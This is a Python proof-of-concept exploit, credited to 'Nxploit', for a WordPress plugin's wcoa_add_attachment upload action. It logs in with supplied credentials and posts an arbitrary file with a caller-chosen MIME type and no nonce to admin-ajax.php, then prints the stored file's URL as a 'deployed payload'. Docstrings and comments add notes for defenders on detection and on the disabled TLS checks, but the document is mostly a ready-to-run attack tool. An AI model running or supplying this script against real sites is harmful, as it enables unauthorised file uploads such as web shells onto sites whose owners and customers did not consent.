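"""Proof-of-concept client for the ``wcoa_add_attachment`` AJAX upload action.

The script logs in to a WordPress site through ``/wp-login.php`` and then sends
one multipart POST to ``/wp-admin/admin-ajax.php`` with ``action`` set to
``wcoa_add_attachment``, an ``order_id`` and an ``attachment`` file part.

Notes for defenders reading this file:

* The upload request carries only ``action`` and ``order_id`` next to the file;
  no nonce field is sent. A server that answers ``status == "success"`` has
  therefore stored the file for this session without one.
* ``action`` travels in the POST body, not the query string, so plain access
  logs show only ``POST /wp-admin/admin-ajax.php``. Matching on the action name
  needs request-body inspection (WAF or application-level logging).
* Whether the server-side handler checks the caller's capability on the order
  or restricts stored file types is not visible from this script; verify that
  against the installed plugin code.
"""

import argparse
import json
import os
import sys

import requests

# exploit by | Nxploit | Khaled alenazi

# NOTE(review): every request below uses verify=False, so the TLS certificate
# of the target is never validated and the login credentials can be
# intercepted on an untrusted network path. This call only hides the
# resulting urllib3 warning; it does not make the connection safer.
requests.packages.urllib3.disable_warnings()

USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"

# Seconds to wait for the server before giving up; without a timeout
# requests can block forever on an unresponsive host.
REQUEST_TIMEOUT = 30


def authenticate(session, url, username, password):
    """Log in through wp-login.php and report whether a session cookie was set.

    Args:
        session: ``requests.Session`` that will hold the login cookies.
        url: Base URL of the WordPress site, without a trailing slash.
        username: WordPress account name.
        password: WordPress account password.

    Returns:
        True if the session holds a cookie whose name contains
        ``wordpress_logged_in`` after the login POST, otherwise False.
    """
    login_url = url + "/wp-login.php"
    login_data = {
        "log": username,
        "pwd": password,
        "rememberme": "forever",
        "wp-submit": "Log In",
    }

    print("[*] Initiating authentication...")
    # The response body is not needed: success is judged from the cookie jar.
    session.post(
        login_url,
        data=login_data,
        verify=False,
        headers={"User-Agent": USER_AGENT},
        timeout=REQUEST_TIMEOUT,
    )

    if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
        print("[✔] Authentication successful.")
        return True

    print("[✘] Authentication failed.")
    return False


def validate_file(file_path):
    """Exit with a non-zero status unless *file_path* is an existing regular file.

    The check uses ``os.path.isfile`` so that a directory is rejected here
    instead of failing later when the file is opened for upload.
    """
    if not os.path.isfile(file_path):
        print(f"[✘] Error: File '{file_path}' not found!")
        sys.exit(1)


def execute_payload(session, url, order_id, file_path, filetype):
    """POST *file_path* to admin-ajax.php as a ``wcoa_add_attachment`` request.

    Args:
        session: Authenticated ``requests.Session``.
        url: Base URL of the WordPress site, without a trailing slash.
        order_id: Value sent in the ``order_id`` form field.
        file_path: Local file to send; also used as the multipart filename.
        filetype: MIME type declared for the file part. It is chosen by the
            caller and is not derived from the file's content.

    Returns:
        The ``requests.Response`` of the upload request.
    """
    upload_url = url + "/wp-admin/admin-ajax.php"
    data = {
        "action": "wcoa_add_attachment",
        "order_id": order_id,
    }

    print(f"[*] Deploying payload: {file_path} to order {order_id}...")
    # Context manager closes the file handle even if the request raises.
    with open(file_path, "rb") as handle:
        files = {"attachment": (file_path, handle, filetype)}
        response = session.post(
            upload_url,
            files=files,
            data=data,
            verify=False,
            headers={"User-Agent": USER_AGENT},
            timeout=REQUEST_TIMEOUT,
        )
    return response


def analyze_response(response):
    """Print whether the server reported the upload as stored.

    A 200 response whose JSON body has ``status == "success"`` is treated as
    accepted, and ``data.url`` (if present) is printed. Any other status code,
    an unparsable body, or a JSON body that is not an object is reported as a
    failure instead of raising.
    """
    if response.status_code != 200:
        print(f"[✘] Deployment failed! HTTP Status: {response.status_code}")
        return

    try:
        payload = response.json()
    except json.JSONDecodeError:
        print("[✘] Failed to parse JSON response.")
        return

    # Valid JSON is not necessarily an object (e.g. a bare 0 or a list).
    if not isinstance(payload, dict) or payload.get("status") != "success":
        print("[✘] Deployment failed.")
        return

    # "data" may be missing or not an object even on a success status.
    details = payload.get("data")
    file_url = details.get("url", "Unknown") if isinstance(details, dict) else "Unknown"
    print("[✔] Payload successfully deployed!")
    print(f"🔗 File URL: {file_url}")


def main():
    """Parse the command line, log in, send the upload and print the result."""
    parser = argparse.ArgumentParser(description="WordPress File Upload via wcoa_add_attachment")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL (e.g., http://example.com/wordpress4)")
    parser.add_argument("-un", "--username", required=True, help="WordPress username")
    parser.add_argument("-p", "--password", required=True, help="WordPress password")
    parser.add_argument("-o", "--order", default="196", help="Order ID to attach the file (default: 196)")
    parser.add_argument("--filename", default="Nxploit.jpg", help="File name to upload (default: Nxploit.jpg)")
    parser.add_argument("--filetype", default="image/jpeg", help="MIME type of the file (default: image/jpeg)")

    args = parser.parse_args()

    session = requests.Session()

    if not authenticate(session, args.url, args.username, args.password):
        # Non-zero status so callers can tell a failed login from a clean run.
        sys.exit(1)

    validate_file(args.filename)

    response = execute_payload(session, args.url, args.order, args.filename, args.filetype)
    analyze_response(response)


if __name__ == "__main__":
    main()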